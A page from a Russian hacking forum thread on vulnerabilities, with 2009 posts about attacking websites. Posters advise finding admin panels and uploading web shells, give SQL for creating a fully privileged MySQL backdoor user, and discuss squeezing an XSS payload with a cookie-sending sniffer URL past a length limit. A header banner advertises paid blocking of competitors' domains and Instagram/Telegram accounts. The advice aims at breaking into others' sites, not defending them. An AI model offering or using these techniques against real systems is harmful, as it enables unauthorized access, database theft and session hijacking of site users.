Ваши вопросы по уязвимостям.

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 801 из 2438

801

Опции темы

Поиск в этой теме

Опции просмотра

#8001

07.07.2009, 15:08

Pashkela

Динозавр

Регистрация: 10.01.2008

Сообщений: 2,841

С нами: 9649706

Репутация: 3338

Файлы читать можешь? Можешь. Ищи админку, пытайся зайти, лей шелл. Ищи конфиги, читай, думай

#8002

07.07.2009, 15:52

genadiez

Познающий

Регистрация: 26.12.2008

Сообщений: 42

С нами: 9144419

Репутация: 59

Доброго дня всем.
Подскажите пожалуйста:

Можно ли имея доступ к MySQL базе данных c правами INSERT каким либо образом (специально сконструированным запросом) поднять эти самые права, так, чтобы можно было базу данных слить?
Или это не выполнимая задача?

Заранее извиняюсь, если вопрос покажется глупым, просто разбираюсь в SQL-injection методом проб и ошибок (язык SQL знаю плохо

)

#8003

07.07.2009, 18:08

RedX

Познающий

Регистрация: 12.06.2008

Сообщений: 32

С нами: 9427499

Репутация: 22

Для того что бы слить базу нужны права SELECT. Insert это уже для правки базы данных..

#8004

07.07.2009, 22:10

PaCo

Постоянный

Регистрация: 06.02.2008

Сообщений: 494

С нами: 9610769

Репутация: 380

Цитата:

Сообщение от genadiez

)

гранты с INSERT без SELECT - это изврашения и наврятли там нет SELECT грантов ибо в конструкции INSERT допустим SELECT(депенд оф версион оф корс), а насчет дампа - тут либо с помошью скрипта(программы при удаленном конекте) локально/удаленно(если разрешенно в конфиге для данного Юзера и порт ничем не прикрыт) либо если еще есть в добавок file_priv дампить в файловую систему и сливать.

#8005

07.07.2009, 22:25

Spyder

Members of Antichat - Level 5

Регистрация: 09.10.2006

Сообщений: 1,698

С нами: 10309346

Репутация: 4303

insert into mysql.user values(...)

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

#8006

07.07.2009, 23:20

Ctacok

Moderator - Level 7

Регистрация: 19.12.2008

Сообщений: 1,203

С нами: 9154406

Репутация: 2221

Цитата:

Сообщение от Spyder

insert into mysql.user values(...)

Это типо можно создать ещё одного юзера или у меня глюки o_O
Щя посмотрю, если это так то приведу пример
ps
Нашёл тока

Цитата:

CREATE USER 'antichat'@'%' IDENTIFIED BY '****';

GRANT ALL PRIVILEGES ON * . * TO 'antichat'@'%' IDENTIFIED BY '****' WITH GRANT OPTION MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0 MAX_UPDATES_PER_HOUR 0 MAX_USER_CONNECTIONS 0 ;

ps2
**** = 0000

Последний раз редактировалось Ctacok; 07.07.2009 в 23:22..

#8007

07.07.2009, 23:23

PaCo

Постоянный

Регистрация: 06.02.2008

Сообщений: 494

С нами: 9610769

Репутация: 380

Цитата:

Сообщение от Ctacok

Это типо можно создать ещё одного юзера или у меня глюки o_O
Щя посмотрю, если это так то приведу пример

Угу, если прав хватит работать с mysql(если уже SELECT нету то я сомневаюмь что к mysql есть доступ).

#8008

07.07.2009, 23:24

Spyder

Members of Antichat - Level 5

Регистрация: 09.10.2006

Сообщений: 1,698

С нами: 10309346

Репутация: 4303

да да, можно юзера создать типа, а вообще проще так
http://www.mysql.ru/docs/man/Adding_users.html

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

#8009

08.07.2009, 00:15

Damned_one

Новичок

Регистрация: 24.11.2008

Сообщений: 24

С нами: 9189896

Репутация: 44

Такой вопрос оч волнует - есть ограничение на ввод символов > 16 в XSS конструкции '><script>alert()</script>

Есть ли какой-то способ втиснуться? может сервисом сокращения воспользоваться?
Но тогда каким? И что сокращать: http://sniffer.gif?+document.cookie

это? помогите пожалуста... мозги спарились уже

#8010

08.07.2009, 00:16

Ctacok

Moderator - Level 7

Регистрация: 19.12.2008

Сообщений: 1,203

С нами: 9154406

Репутация: 2221

Запрос метода GET или POST?
Вааще если GET то врядтле ограничят.
А если через POST то в инпуте есть ограничение.
Убери его через исходник, но это если сам php скрипт непроверяет входящие данные.

Последний раз редактировалось Ctacok; 08.07.2009 в 00:20..

Страница 801 из 2438

801

Предыдущая тема Следующая тема

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход